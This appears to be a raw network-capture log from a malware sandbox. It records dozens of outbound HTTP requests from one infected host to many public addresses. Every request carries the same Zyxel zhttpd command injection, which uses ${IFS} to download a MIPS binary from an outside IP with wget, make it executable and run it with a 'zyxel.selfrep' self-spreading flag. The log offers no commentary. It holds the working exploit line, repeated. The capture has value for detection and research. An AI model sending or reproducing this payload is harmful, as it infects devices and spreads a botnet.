                                      Jan 14, 2024 15:50:37.069871902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1893192.168.2.1449598196.66.124.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069907904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1894192.168.2.145858243.102.3.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.069986105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1895192.168.2.146021835.153.198.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070019960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1896192.168.2.145737634.229.159.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070074081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1897192.168.2.143745818.192.202.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070105076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1898192.168.2.1438236141.89.121.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070132017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1899192.168.2.144417464.215.126.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070195913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1900192.168.2.143721240.151.169.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070231915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1901192.168.2.1437840199.161.90.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070277929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1902192.168.2.1450882217.53.210.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070319891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1903192.168.2.145746088.20.89.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070353985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1904192.168.2.1449420140.41.109.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070399046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1905192.168.2.1439444195.145.39.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070419073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1906192.168.2.145113649.144.48.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070467949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1907192.168.2.144206499.151.129.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070501089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1908192.168.2.1446116182.203.178.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070575953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1909192.168.2.1454016223.41.113.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070614100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1910192.168.2.143909641.176.247.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070664883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1911192.168.2.1442290150.8.104.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070724010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1912192.168.2.1440812132.171.222.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070753098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1913192.168.2.1460858130.140.35.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070785999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1914192.168.2.143563269.149.231.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070837021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1915192.168.2.146079238.17.199.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070869923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1916192.168.2.1458848193.36.216.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070899963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1917192.168.2.1443368161.165.201.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070934057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1918192.168.2.1451398112.173.157.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.070987940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1919192.168.2.1433498130.139.96.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071036100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1920192.168.2.1442990179.179.30.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071077108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1921192.168.2.14382288.192.63.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071130991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1922192.168.2.1459428212.214.76.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071182013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1923192.168.2.144683423.229.119.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071224928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1924192.168.2.1437414160.79.31.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071259975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1925192.168.2.1454504134.147.75.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071302891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1926192.168.2.144327060.26.157.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071346998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1927192.168.2.1459690220.36.152.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071396112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1928192.168.2.1444502135.169.132.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071443081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1929192.168.2.144804473.10.86.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071486950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1930192.168.2.1453332108.176.161.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071521044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1931192.168.2.144761081.107.149.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071571112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1932192.168.2.1443534139.199.185.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071604967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1933192.168.2.144237069.238.9.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071633101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1934192.168.2.144757870.178.105.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071671963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1935192.168.2.1453234159.234.163.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071721077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1936192.168.2.144370489.194.48.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071748972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1937192.168.2.1442136102.125.243.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071794987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1938192.168.2.1438186151.58.64.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071820021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1939192.168.2.1456280149.152.15.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071865082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1940192.168.2.144440249.237.204.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071911097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1941192.168.2.144278464.72.76.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071942091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1942192.168.2.144637870.57.113.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.071996927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1943192.168.2.1438920155.193.151.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072030067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1944192.168.2.1441486178.189.167.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072083950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1945192.168.2.144940459.203.94.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072134972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1946192.168.2.144314050.203.117.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072170019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1947192.168.2.1450298177.172.214.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072197914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1948192.168.2.143645695.64.66.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072218895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1949192.168.2.1454440110.180.218.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072287083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1950192.168.2.1445622201.21.9.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072326899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1951192.168.2.1459694178.202.97.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072367907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1952192.168.2.145252080.191.46.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072422981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1953192.168.2.145753818.197.132.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072462082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1954192.168.2.1447180112.211.116.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.072504044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1955192.168.2.143653274.201.23.124443
                                      TimestampBytes transferredDirectionData
